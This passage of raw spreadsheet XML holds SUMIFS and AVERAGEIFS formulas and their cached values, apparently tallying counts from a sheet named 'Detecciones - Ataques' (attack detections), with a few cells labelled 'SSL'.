        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>1</v>
      </c>
      <c r="AR44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>1</v>
      </c>
      <c r="AS44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>1</v>
      </c>
      <c r="AU44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>1</v>
      </c>
      <c r="AV44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>2</v>
      </c>
      <c r="AW44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>2</v>
      </c>
      <c r="AY44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>0</v>
      </c>
      <c r="BA44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>1</v>
      </c>
      <c r="BD44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>1</v>
      </c>
      <c r="BI44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>0</v>
      </c>
      <c r="BL44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>0</v>
      </c>
      <c r="BM44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>611</v>
      </c>
      <c r="BN44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>745</v>
      </c>
      <c r="BO44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>0</v>
      </c>
      <c r="BR44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>0</v>
      </c>
      <c r="BT44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>0</v>
      </c>
      <c r="BU44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>0</v>
      </c>
      <c r="BX44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>1</v>
      </c>
      <c r="BZ44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>0</v>
      </c>
      <c r="CA44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>0</v>
      </c>
      <c r="CC44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>0</v>
      </c>
      <c r="CG44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>0</v>
      </c>
      <c r="CJ44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>2</v>
      </c>
      <c r="CL44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>3</v>
      </c>
      <c r="CN44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>0</v>
      </c>
      <c r="CP44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>18</v>
      </c>
      <c r="CQ44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>0</v>
      </c>
      <c r="CR44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>15</v>
      </c>
      <c r="CT44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>2</v>
      </c>
      <c r="CU44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>0</v>
      </c>
      <c r="CY44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>0</v>
      </c>
      <c r="CZ44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>5</v>
      </c>
      <c r="DE44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>0</v>
      </c>
      <c r="DF44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>18</v>
      </c>
      <c r="DI44" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ44" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BI3:$BI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>0</v>
      </c>
      <c r="DK44" s="271"/>
      <c r="DO44" s="439"/>
      <c r="DP44" s="435" t="s">
        <v>2497</v>
      </c>
      <c r="DQ44" s="440">
        <f>DU43-DQ43</f>
        <v>40</v>
      </c>
      <c r="DR44" s="440">
        <f>DU43-DR43</f>
        <v>26</v>
      </c>
      <c r="DS44" s="440">
        <f>DU43-DS43</f>
        <v>16</v>
      </c>
      <c r="DT44" s="440">
        <f>DU43-DT43</f>
        <v>14</v>
      </c>
      <c r="DU44" s="441"/>
      <c r="DV44" s="271"/>
      <c r="DW44" s="435" t="s">
        <v>2498</v>
      </c>
      <c r="DX44" s="442">
        <f>EB43-DX43</f>
        <v>66</v>
      </c>
      <c r="DY44" s="442">
        <f>EB43-DY43</f>
        <v>50</v>
      </c>
      <c r="DZ44" s="442">
        <f>EB43-DZ43</f>
        <v>36</v>
      </c>
      <c r="EA44" s="442">
        <f>EB43-EA43</f>
        <v>33</v>
      </c>
      <c r="EB44" s="437"/>
      <c r="EC44" s="271"/>
      <c r="ED44" s="280"/>
      <c r="EG44" s="279"/>
      <c r="EH44" s="271"/>
      <c r="EI44" s="435" t="s">
        <v>2499</v>
      </c>
      <c r="EJ44" s="443">
        <f>EJ43/EN43</f>
        <v>0.07022900763</v>
      </c>
      <c r="EK44" s="443">
        <f>EK43/EN43</f>
        <v>0.2809160305</v>
      </c>
      <c r="EL44" s="443">
        <f>EL43/EN43</f>
        <v>0.4519083969</v>
      </c>
      <c r="EM44" s="443">
        <f>EM43/EN43</f>
        <v>1</v>
      </c>
      <c r="EN44" s="437"/>
      <c r="EO44" s="438"/>
      <c r="EP44" s="438"/>
      <c r="EQ44" s="438"/>
      <c r="ER44" s="271"/>
      <c r="ES44" s="271"/>
      <c r="ET44" s="271"/>
      <c r="EU44" s="271"/>
      <c r="EV44" s="271"/>
      <c r="EW44" s="432"/>
      <c r="EX44" s="432"/>
      <c r="EY44" s="432"/>
      <c r="EZ44" s="432"/>
      <c r="FA44" s="367"/>
      <c r="FK44" s="276"/>
      <c r="FQ44" s="392"/>
      <c r="FR44" s="392"/>
      <c r="FS44" s="392"/>
      <c r="FT44" s="392"/>
      <c r="FU44" s="392"/>
      <c r="FV44" s="392"/>
      <c r="FW44" s="392"/>
      <c r="FX44" s="392"/>
      <c r="FY44" s="392"/>
      <c r="FZ44" s="392"/>
      <c r="GA44" s="392"/>
      <c r="GB44" s="392"/>
      <c r="GC44" s="392"/>
      <c r="GD44" s="392"/>
      <c r="GE44" s="392"/>
      <c r="GF44" s="392"/>
      <c r="GG44" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SSL")</f>
        <v>SSL</v>
      </c>
      <c r="GH44" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG44)</f>
        <v>0</v>
      </c>
      <c r="GI44" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG44)</f>
        <v>0</v>
      </c>
      <c r="GJ44" s="373">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG44)</f>
        <v>0</v>
      </c>
      <c r="GK44" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SSL")</f>
        <v>SSL</v>
      </c>
      <c r="GL44" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG44)</f>
        <v>0</v>
      </c>
      <c r="GM44" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG44)</f>
        <v>0</v>
      </c>
      <c r="GN44" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG44)</f>
        <v>0</v>
      </c>
      <c r="GO44" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SSL")</f>
        <v>SSL</v>
      </c>
      <c r="GP44" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG44)</f>
        <v>0</v>
      </c>
      <c r="GQ44" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG44)</f>
        <v>0</v>
      </c>
      <c r="GR44" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG44)</f>
        <v>0</v>
      </c>
      <c r="GS44" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SSL")</f>
        <v>SSL</v>
      </c>
      <c r="GT44" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG44)</f>
        <v>0</v>
      </c>
      <c r="GU44" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG44)</f>
        <v>0</v>
      </c>
      <c r="GV44" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG44)</f>
        <v>0</v>
      </c>
      <c r="GW44" s="392"/>
      <c r="GX44" s="392"/>
      <c r="GY44" s="392"/>
      <c r="GZ44" s="392"/>
      <c r="HA44" s="392"/>
      <c r="HB44" s="392"/>
      <c r="HC44" s="392"/>
      <c r="HD44" s="392"/>
      <c r="HE44" s="392"/>
      <c r="HF44" s="392"/>
      <c r="HG44" s="392"/>
      <c r="HH44" s="392"/>
      <c r="HI44" s="392"/>
      <c r="HJ44" s="392"/>
      <c r="HK44" s="392"/>
      <c r="HL44" s="392"/>
      <c r="HM44" s="392"/>
      <c r="HN44" s="392"/>
      <c r="HO44" s="392"/>
      <c r="HP44" s="392"/>
    </row>
    <row r="45">
      <c r="B45" s="277"/>
      <c r="C45" s="271"/>
      <c r="D45" s="271"/>
      <c r="E45" s="271"/>
      <c r="F45" s="271"/>
      <c r="G45" s="278"/>
      <c r="J45" s="277"/>
      <c r="K45" s="352" t="s">
        <v>2500</v>
      </c>
      <c r="L45" s="403" t="s">
        <v>2501</v>
      </c>
      <c r="M45" s="403" t="s">
        <v>2502</v>
      </c>
      <c r="N45" s="404" t="s">
        <v>2503</v>
      </c>
      <c r="O45" s="278"/>
      <c r="Q45" s="271"/>
      <c r="R45" s="386" t="s">
        <v>2490</v>
      </c>
      <c r="S45" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>1295</v>
      </c>
      <c r="T45" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>1253</v>
      </c>
      <c r="U45" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>113</v>
      </c>
      <c r="V45" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>13</v>
      </c>
      <c r="W45" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X45" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$CW3:$CW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="Y45" s="353">
